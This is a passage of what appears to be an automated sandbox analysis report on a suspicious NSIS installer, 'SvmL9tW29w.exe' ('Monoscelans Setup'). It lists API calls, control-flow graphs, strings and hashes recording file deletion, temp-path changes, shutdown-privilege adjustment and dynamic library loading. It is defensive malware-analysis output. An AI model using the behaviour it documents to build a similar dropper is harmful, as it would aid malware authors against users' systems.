                                                              • SetErrorMode.KERNELBASE ref: 0040336D
                                                              • GetVersion.KERNEL32 ref: 00403373
                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                              • #17.COMCTL32(?,?,?,?), ref: 004033E2
                                                              • OleInitialize.OLE32(00000000), ref: 004033E9
                                                              • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,?,?,?), ref: 00403405
                                                              • GetCommandLineA.KERNEL32(Monoscelans Setup,NSIS Error,?,?,?,?), ref: 0040341A
                                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\SvmL9tW29w.exe",00000020,"C:\Users\user\Desktop\SvmL9tW29w.exe",00000000,?,?,?,?), ref: 00403456
                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020,?,?,?,?), ref: 00403553
                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,?,?,?), ref: 00403564
                                                              • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,?,?,?), ref: 00403570
                                                              • GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,?,?,?), ref: 00403584
                                                              • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,?,?,?), ref: 0040358C
                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,?,?,?), ref: 0040359D
                                                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,?,?,?), ref: 004035A5
                                                              • DeleteFileA.KERNELBASE(1033,?,?,?,?), ref: 004035B9
                                                                • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,?), ref: 00406512
                                                                • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                • Part of subcall function 0040390A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,?,771B3410), ref: 004039FA
                                                                • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                                • Part of subcall function 0040390A: LoadImageA.USER32(?,?,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                                • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                • Part of subcall function 00403830: CloseHandle.KERNEL32(000002E0,00403667,?,?,?,?,?), ref: 0040383B
                                                              • OleUninitialize.OLE32(?,?,?,?,?), ref: 00403667
                                                              • ExitProcess.KERNEL32 ref: 00403688
                                                              • GetCurrentProcess.KERNEL32(?,?,?,?,?), ref: 004037A5
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                              • ExitWindowsEx.USER32(?,80040002), ref: 00403807
                                                              • ExitProcess.KERNEL32 ref: 0040382A
                                                                • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                              • String ID: "$"C:\Users\user\Desktop\SvmL9tW29w.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SvmL9tW29w.exe$C:\Users\user\tranchet$C:\Users\user\tranchet\Trykmaalere$Error launching installer$Low$Monoscelans Setup$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                              • API String ID: 3776617018-145501955
                                                              • Opcode ID: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                              • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                              • Opcode Fuzzy Hash: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                              • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                              APIs
                                                                • Part of subcall function 742F1215: GlobalAlloc.KERNEL32(?,742F1233,?,742F12CF,-742F404B,742F11AB,-000000A0), ref: 742F121D
                                                              • GlobalAlloc.KERNELBASE(?,000014A4), ref: 742F1BC4
                                                              • lstrcpyA.KERNEL32(00000008,?), ref: 742F1C0C
                                                              • lstrcpyA.KERNEL32(00000408,?), ref: 742F1C16
                                                              • GlobalFree.KERNEL32(00000000), ref: 742F1C29
                                                              • GlobalFree.KERNEL32(?), ref: 742F1D09
                                                              • GlobalFree.KERNEL32(?), ref: 742F1D0E
                                                              • GlobalFree.KERNEL32(?), ref: 742F1D13
                                                              • GlobalFree.KERNEL32(00000000), ref: 742F1EFA
                                                              • lstrcpyA.KERNEL32(?,?), ref: 742F2098
                                                              • GetModuleHandleA.KERNEL32(00000008), ref: 742F2114
                                                              • LoadLibraryA.KERNEL32(00000008), ref: 742F2125
                                                              • GetProcAddress.KERNEL32(?,?), ref: 742F217E
                                                              • lstrlenA.KERNEL32(00000408), ref: 742F2198
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3778973022.00000000742F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 742F0000, based on PE: true
                                                              • Associated: 00000000.00000002.3778066901.00000000742F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3778991125.00000000742F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.3779007150.00000000742F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_742f0000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                              • String ID:
                                                              • API String ID: 245916457-0
                                                              • Opcode ID: 46dffd24c04f098b5f3b04af8105371f4830c6674e42619fdc7e1203b718d283
                                                              • Instruction ID: eecea4730a2e7444a75f25f7bddc360cb95a0975a57e5b50b8763513721b091b
                                                              • Opcode Fuzzy Hash: 46dffd24c04f098b5f3b04af8105371f4830c6674e42619fdc7e1203b718d283
                                                              • Instruction Fuzzy Hash: 3022AA72B1420A9ADB128FA5CC807EEFBF5BF05310FD4452ED192A2280DB795B61CB61

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 558 4058bf-4058e5 call 405b7d 561 4058e7-4058f9 DeleteFileA 558->561 562 4058fe-405905 558->562 563 405a88-405a8c 561->563 564 405907-405909 562->564 565 405918-405928 call 4060f7 562->565 566 405a36-405a3b 564->566 567 40590f-405912 564->567 573 405937-405938 call 405ad6 565->573 574 40592a-405935 lstrcatA 565->574 566->563 570 405a3d-405a40 566->570 567->565 567->566 571 405a42-405a48 570->571 572 405a4a-405a52 call 40646b 570->572 571->563 572->563 581 405a54-405a68 call 405a8f call 405877 572->581 576 40593d-405940 573->576 574->576 579 405942-405949 576->579 580 40594b-405951 lstrcatA 576->580 579->580 582 405956-405974 lstrlenA FindFirstFileA 579->582 580->582 597 405a80-405a83 call 40521e 581->597 598 405a6a-405a6d 581->598 584 40597a-405991 call 405aba 582->584 585 405a2c-405a30 582->585 591 405993-405997 584->591 592 40599c-40599f 584->592 585->566 587 405a32 585->587 587->566 591->592 594 405999 591->594 595 4059a1-4059a6 592->595 596 4059b2-4059c0 call 4060f7 592->596 594->592 600 4059a8-4059aa 595->600 601 405a0b-405a1d FindNextFileA 595->601 608 4059c2-4059ca 596->608 609 4059d7-4059e2 call 405877 596->609 597->563 598->571 603 405a6f-405a7e call 40521e call 405ed6 598->603 600->596 604 4059ac-4059b0 600->604 601->584 606 405a23-405a26 FindClose 601->606 603->563 604->596 604->601 606->585 608->601 611 4059cc-4059d5 call 4058bf 608->611 617 405a03-405a06 call 40521e 609->617 618 4059e4-4059e7 609->618 611->601 617->601 620 4059e9-4059f9 call 40521e call 405ed6 618->620 621 4059fb-405a01 618->621 620->601 621->601
                                                              APIs
                                                              • DeleteFileA.KERNELBASE(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004058E8
                                                              • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405930
                                                              • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405951
                                                              • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405957
                                                              • FindFirstFileA.KERNELBASE(0042B898,?,?,?,0040A014,?,0042B898,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405968
                                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,?), ref: 00405A15
                                                              • FindClose.KERNEL32(00000000), ref: 00405A26
                                                              Strings
                                                              • "C:\Users\user\Desktop\SvmL9tW29w.exe", xrefs: 004058BF
                                                              • \*.*, xrefs: 0040592A
                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004058CC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: "C:\Users\user\Desktop\SvmL9tW29w.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                              • API String ID: 2035342205-3682307936
                                                              • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                              • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                              • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                              • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                              APIs
                                                              • CoCreateInstance.OLE32(00408524,?,?,00408514,?,?,?,000000CD,?,000000DF,000000F0), ref: 004021F0
                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00408514,?,?,?,000000CD,?,000000DF,000000F0), ref: 004022A2
                                                              Strings
                                                              • C:\Users\user\tranchet\Trykmaalere, xrefs: 00402230
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                              • String ID: C:\Users\user\tranchet\Trykmaalere
                                                              • API String ID: 123533781-2000945231
                                                              • Opcode ID: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                              • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                              • Opcode Fuzzy Hash: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                              • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                              APIs
                                                              • FindFirstFileA.KERNELBASE(771B3410,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004058DF,?,771B3410,C:\Users\user~1\AppData\Local\Temp\), ref: 00406476
                                                              • FindClose.KERNELBASE(00000000), ref: 00406482
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                              • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                              • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                              • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                              APIs
                                                              • FindFirstFileA.KERNELBASE(00000000,?,?), ref: 004027B0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID:
                                                              • API String ID: 1974802433-0
                                                              • Opcode ID: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                              • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                              • Opcode Fuzzy Hash: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                              • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 134 40390a-403922 call 406500 137 403924-403934 call 406055 134->137 138 403936-403967 call 405fde 134->138 147 40398a-4039b3 call 403bcf call 405b7d 137->147 143 403969-40397a call 405fde 138->143 144 40397f-403985 lstrcatA 138->144 143->144 144->147 152 4039b9-4039be 147->152 153 403a3a-403a42 call 405b7d 147->153 152->153 155 4039c0-4039e4 call 405fde 152->155 159 403a50-403a75 LoadImageA 153->159 160 403a44-403a4b call 40618a 153->160 155->153 161 4039e6-4039e8 155->161 163 403af6-403afe call 40140b 159->163 164 403a77-403aa7 RegisterClassA 159->164 160->159 165 4039f9-403a05 lstrlenA 161->165 166 4039ea-4039f7 call 405aba 161->166 177 403b00-403b03 163->177 178 403b08-403b13 call 403bcf 163->178 167 403bc5 164->167 168 403aad-403af1 SystemParametersInfoA CreateWindowExA 164->168 172 403a07-403a15 lstrcmpiA 165->172 173 403a2d-403a35 call 405a8f call 4060f7 165->173 166->165 171 403bc7-403bce 167->171 168->163 172->173 176 403a17-403a21 GetFileAttributesA 172->176 173->153 180 403a23-403a25 176->180 181 403a27-403a28 call 405ad6 176->181 177->171 187 403b19-403b33 ShowWindow call 406492 178->187 188 403b9c-403ba4 call 4052f0 178->188 180->173 180->181 181->173 193 403b35-403b3a call 406492 187->193 194 403b3f-403b51 GetClassInfoA 187->194 195 403ba6-403bac 188->195 196 403bbe-403bc0 call 40140b 188->196 193->194 199 403b53-403b63 GetClassInfoA RegisterClassA 194->199 200 403b69-403b9a DialogBoxParamA call 40140b call 40385a 194->200 195->177 201 403bb2-403bb9 call 40140b 195->201 196->167 199->200 200->171 201->177
                                                              APIs
                                                                • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,?), ref: 00406512
                                                                • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                              • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\SvmL9tW29w.exe",00000000), ref: 00403985
                                                              • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,?,771B3410), ref: 004039FA
                                                              • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                              • GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                              • LoadImageA.USER32(?,?,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                                • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                              • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                              • SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 00403AB6
                                                              • CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                              • ShowWindow.USER32(?,00000000), ref: 00403B21
                                                              • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                              • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                              • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                              • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: "C:\Users\user\Desktop\SvmL9tW29w.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\tranchet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                              • API String ID: 1975747703-3030435083
                                                              • Opcode ID: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                              • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                              • Opcode Fuzzy Hash: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                              • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 208 402ea1-402eef GetTickCount GetModuleFileNameA call 405c90 211 402ef1-402ef6 208->211 212 402efb-402f29 call 4060f7 call 405ad6 call 4060f7 GetFileSize 208->212 213 4030d1-4030d5 211->213 220 403014-403022 call 402e3d 212->220 221 402f2f 212->221 227 403024-403027 220->227 228 403077-40307c 220->228 223 402f34-402f4b 221->223 225 402f4d 223->225 226 402f4f-402f58 call 4032ea 223->226 225->226 234 40307e-403086 call 402e3d 226->234 235 402f5e-402f65 226->235 230 403029-403041 call 403300 call 4032ea 227->230 231 40304b-403075 GlobalAlloc call 403300 call 4030d8 227->231 228->213 230->228 256 403043-403049 230->256 231->228 255 403088-403099 231->255 234->228 239 402fe1-402fe5 235->239 240 402f67-402f7b call 405c4b 235->240 244 402fe7-402fee call 402e3d 239->244 245 402fef-402ff5 239->245 240->245 259 402f7d-402f84 240->259 244->245 250 403004-40300c 245->250 251 402ff7-403001 call 4065b7 245->251 250->223 254 403012 250->254 251->250 254->220 260 4030a1-4030a6 255->260 261 40309b 255->261 256->228 256->231 259->245 263 402f86-402f8d 259->263 265 4030a7-4030ad 260->265 261->260 263->245 264 402f8f-402f96 263->264 264->245 266 402f98-402f9f 264->266 265->265 267 4030af-4030ca SetFilePointer call 405c4b 265->267 266->245 268 402fa1-402fc1 266->268 271 4030cf 267->271 268->228 270 402fc7-402fcb 268->270 272 402fd3-402fdb 270->272 273 402fcd-402fd1 270->273 271->213 272->245 274 402fdd-402fdf 272->274 273->254 273->272 274->245
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00402EB2
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SvmL9tW29w.exe,00000400), ref: 00402ECE
                                                                • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(?,00402EE1,C:\Users\user\Desktop\SvmL9tW29w.exe,80000000,?), ref: 00405C94
                                                                • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405CB6
                                                              • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SvmL9tW29w.exe,C:\Users\user\Desktop\SvmL9tW29w.exe,80000000,?), ref: 00402F1A
                                                              • GlobalAlloc.KERNELBASE(?,00000020), ref: 00403050
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3745489820.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3745344014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745548230.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3745585504.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3746021095.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SvmL9tW29w.jbxd
                                                              Similarity
                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                              • String ID: "C:\Users\user\Desktop\SvmL9tW29w.exe"$@TA$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SvmL9tW29w.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                              • API String ID: 2803837635-3557172563
                                                              • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
